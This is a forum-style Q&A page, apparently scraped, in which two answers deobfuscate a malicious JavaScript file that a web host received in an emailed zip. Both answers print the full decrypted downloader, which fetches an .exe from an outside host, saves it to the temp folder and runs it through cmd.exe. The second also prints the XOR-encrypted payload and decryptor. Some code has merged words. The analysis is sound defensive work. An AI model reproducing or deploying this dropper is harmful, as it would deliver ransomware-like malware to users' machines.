What Does The Following Code Snippet Do? (javascript)
So some background. I currently host a few small sites for my clients. I use cPanel. Recently, I received an email on my server with a zip file. The zip file contains the following
Solution 1:
Here is what it does: The code decrypts the long string variable (var lzpxyboxat="f0f70ca69f5683161c510c...). The decrypted string is again JavaScript code, which is then executed. This is the decrypted code:
function getDataFromUrl(url, callback) {
try {
var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
xmlHttp.open("GET", url, false);
xmlHttp.send();
if (xmlHttp.status == 200) {
return callback(xmlHttp.ResponseBody, false);
} else {
return callback(null, true);
}
} catch (error) {
return callback(null, true);
}
}
function getData(callback) {
try {
getDataFromUrl("http://bobdomjda.top/admin.php?f=2.gif", function (result, error) {
if (!error) {
return callback(result, false);
} else {
getDataFromUrl("http://bobdomjda.top/admin.php?f=2.gif", function (result, error) {
if (!error) {
return callback(result, false);
} else {
getDataFromUrl("http://bobdomjda.top/admin.php?f=2.gif", function (result, error) {
if (!error) {
return callback(result, false);
} else {
return callback(null, true);
}
});
}
});
}
});
} catch (error) {
return callback(null, true);
}
}
function getTempFilePath() {
try {
var fs = new ActiveXObject("Scripting.FileSystemObject");
var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe";
var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
return tmpFilePath;
} catch (error) {
returnfalse;
}
}
function saveToTemp(data, callback) {
try {
var path = getTempFilePath();
if (path) {
var objStream = new ActiveXObject("ADODB.Stream");
objStream.Open();
objStream.Type = 1;
objStream.Write(data);
objStream.Position = 0;
objStream.SaveToFile(path, 2);
objStream.Close();
return callback(path, false);
} else {
return callback(null, true);
}
} catch (error) {
return callback(null, true);
}
}
getData(function (data, error) {
if (!error) {
saveToTemp(data, function (path, error) {
if (!error) {
try {
var wsh = new ActiveXObject("WScript.Shell");
wsh.Run("cmd.exe /c start " + path + " & del *.js");
} catch (error) {
}
}
});
}
});
This code downloads a file from the URL (WARNING: potentially malicious file) http://bobdomjda.top/admin.php?f=2.gif. The file is saved in the temporary files folder and executed with cmd.exe /c start [filename].
As far as I can see the downloading and execution will only work on Windows systems.
I uploaded the file to VirusTotal: analysis result.
Solution 2:
Deobfuscating your script yields:
var encrypted =
"f0f70ca69f5683161c510cebd2e316a4ad4d8315694405b7e3f00ee9cb5c8d14505408fcfdab19b19946970e5d4449e7fbee2ab19f4fcc451c580ce8b6c301b182498920735403faf5f64ae7a66cb435700447c7dbce2a91bf6fce51074e04f3def616b5"+
"c5509c1d521e4bd8d3d640e9cb4a9e1410160ffefaf107ecd047811474421defb8f107ab8f17c543555049b7eeef0e8d9f4b9c564f4208ebe3f142f8d61fde480c1f49e4e4e716b09951cc1b5d5a05fdf7e109ed93528030484219b1c4e711b584519f1d"+
"7e590de6baa204a4874c8951074b0cf3e5e719b78e4b990a52160afefaee00a48854c416495a05b3b6f610b08e16d705415508ebf5ea42ed8e4d9e174e1f12edf3f617b7851f8f19505a0bfef5e94aab9e5380541c421beaf3ab59b8965999165f4200f0"+
"f8a205a09f7b8d0c5d1e0afefaee00a48854c503484410e4f1e716818a4b8d3e4e5904cae4ee4ae7834b9808061946fdf9e006aa86558819124206efb9e306a88251c208544656f9abb04ca28259ce541c501cf1f5f60baa85179e1d4f4305ebbaa207b7"+
"99509e511c4d00f9b6aa43a0994d830a154d1bfae2f710abcb5c8d14505408fcfdaa10a0984a800c10160ffefaf107ecd04289144f5312f8f3f626a49f5eaa0a535b3cedfaaa40ad9f4b9c4213190bf0f4e60da8815b8d56485919b0f7e60fac85119c10"+
"4c090fa2a4ac05ac8d1dc0585a4307fce2eb0dabc34d890b495a1db3b6e710b7844dc558475f0fbfbea307b799509e5147440cebe3f00ce5885e80145e570af4bef007b69e5398541c5008f3e5e74bfe965a800b594d0efae2c603b18a799e1751631bf3"+
"bea00ab19f4fd657135406fdf2ed0faf8f5ec20c534646fef2ef0babc54f8408035054adb8e50ba3c913cc1e49580aebffed0ced995a9f0d504245bff3f010aa9916cc03555049b7b7e710b7844dc5034e531deae4ec42a68a53801a5d5502b7e4e711b0"+
"874bc0585a5705ecf3ab59b88e539f1d47440cebe3f00ce5885e80145e570af4beec17a98713cc0c4e430cb6adff1fecd0429151074b14b6adff01a49f5c845814531bedf9f04bbe995a980d4e5849fcf7ee0ea78a5c8750524305f3baa216b79e5ac543"+
"414b0feaf8e116ac8451cc1f59423dfafbf224ac875abc19485e41b6edf610bc90498d0a1c501abfaba20ca09c1fad1b485f1ffacecd00af8e5c98501e650aedfff216ac8558c23e555a0ccceff116a086708e1259551dbdbfb914a4991f98154c7000f3"+
"f3cc03a88e1fd1581e6a35bdb6a942888a4b84564e5707fbf9ef4aecc54b832b484400f1f1aa51f3c2119f0d5e451dedbeb04ee5d216cc531c1447faeee740fe9d5e9e58485b19d9ffee07958a4b845801160fecb8c507b1b84f891b555705d9f9ee06a0"+
"9917de511c1d49ebfbf224ac875aa219515352edf3f617b7851f98154c7000f3f3d203b18304911b5d420af7b6aa07b799509e5147440cebe3f00ce58d5e800b590d14e2f0f70ca69f5683161c4508e9f3d60d918e529c5058571dfebaa201a487538e19"+
"5f5d40e4e2f01bbe9d5e9e584c571df7b6bf42a28e4bb81d51462ff6fae732a49f57c451075f0fbfbef203b18316970e5d4449f0f4e831b1995a8d151c0b49f1f3f54284884b850e596e26fdfce701b1c31dad3c73722bb1c5f610a08a52ce5107590bf5"+
"c5f610a08a52c2374c5307b7bfb90da7816c980a595704b1c2fb12a0cb02cc4907590bf5c5f610a08a52c22f4e5f1dfabee603b18a16d7175e5c3aebe4e703a8c56f830b554200f0f8a25fe5db04831a56651dedf3e30febb85e9a1d68592ff6fae74ab5"+
"8a4b84541c0440a4f9e008969f4d891951182af3f9f107edc2049e1d48431bf1b6e103a9875d8d1b571e19fee2ea4ee58d5e800b591f52e2f3ee11a0cb449e1d48431bf1b6e103a9875d8d1b571e07eafaee4ee59f4d991d150d14e2f5e316a6831fc41d"+
"4e4406edbff910a09f4a9e161c5508f3fae003a68017820d505a45bfe2f017a0c20491055b531ddbf7f603ed8d4a821b485f06f1b6aa06a49f5ec05859441bf0e4ab42be8259cc501d531bedf9f04bbe985e9a1d68593dfafbf24aa18a4b8d541c501cf1"+
"f5f60baa851fc4085d4201b3b6e710b7844dc558475f0fbfbea307b799509e5147421be6edf403b7cb489f101c0b49f1f3f54284884b850e596e26fdfce701b1c31dbb2b5f4400efe2ac31ad8e53805a150d1eecfeac30b08517ce1b515247faeee742ea"+
"881f9f0c5d441dbfb4a912a49f57c75a1c1049fbf3ee42efc5559f5a150d14fcf7f601adcb17890a4e591bb6b6f91fb89616d705411f52";
functiondecrypt(encrypted) {
var key = newArray(150, 130, 98, 197, 235, 63, 236, 120, 60, 54, 105, 159),
bytes = encoded.match(/\S{2}/g),
code = "";
for (var i = 0, j = 0; i < bytes.length; i++, j++) {
if (j >= key.length) {
j = 0;
}
code += String.fromCharCode(parseInt(bytes[i], 16) ^ key[j]);
}
return code;
}
// eval(decrypt(encrypted)); // commented out to prevent accidental executionThe script contains encrypted JavaScript code and a decrypt function based on a simple XOR cipher.
Decrypting the encrypted code yields:
function getDataFromUrl(url, callback) {
try{
var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
xmlHttp.open("GET", url, false);
xmlHttp.send();
if (xmlHttp.status == 200) {
return callback(xmlHttp.ResponseBody, false);
} else {
return callback(null, true);
}
} catch (error) {
return callback(null, true);
}
}
function getData(callback) {
try {
getDataFromUrl(
"http://bobdomjda.top/admin.php?f=2.gif",
function(result, error) {
if (!error) {
return callback(result, false);
} else {
getDataFromUrl(
"http://bobdomjda.top/admin.php?f=2.gif",
function(result, error) {
if (!error) {
return callback(result, false);
} else {
getDataFromUrl(
"http://bobdomjda.top/admin.php?f=2.gif",
function(result, error) {
if (!error) {
return callback(result, false);
} else {
return callback(null, true);
}
}
);
}
}
);
}
}
);
} catch (error) {
return callback(null, true);
}
}
function getTempFilePath() {
try {
var fs = new ActiveXObject("Scripting.FileSystemObject");
var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe";
var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
return tmpFilePath;
} catch (error) {
returnfalse;
}
}
function saveToTemp(data, callback) {
try {
var path = getTempFilePath();
if (path) {
var objStream = new ActiveXObject("ADODB.Stream");
objStream.Open();
objStream.Type = 1;
objStream.Write(data);
objStream.Position = 0;
objStream.SaveToFile(path, 2);
objStream.Close();
return callback(path, false);
} else {
return callback(null, true);
}
} catch (error) {
return callback(null, true);
}
}
getData(
function (data, error) {
if (!error) {
saveToTemp(
data,
function (path, error) {
if (!error) {
try {
var wsh = new ActiveXObject("WScript.Shell");
// wsh.Run("cmd.exe /c start "+path+" & del *.js"); // Commented out to prevent accidental execution
} catch (error) {}
}
}
);
}
}
);
This script
- Downloads an executable file from
http://bobdomjda.top/admin.php?f=2.gif - Uses ActiveX ("Scripting.FileSystemObject", "ADODB.Stream") to save it on your local filesystem as e.g. "owynovqn2.exe"
- Uses ActiveX ("WScript.Shell") to execute it.
According to virustotal.com, 8 of 61 virus scanners recognize the executable file as malicious, e.g. McAfee classifies it as "BehavesLike.Win32.Ransom.dc".
Post a Comment for "What Does The Following Code Snippet Do? (javascript)"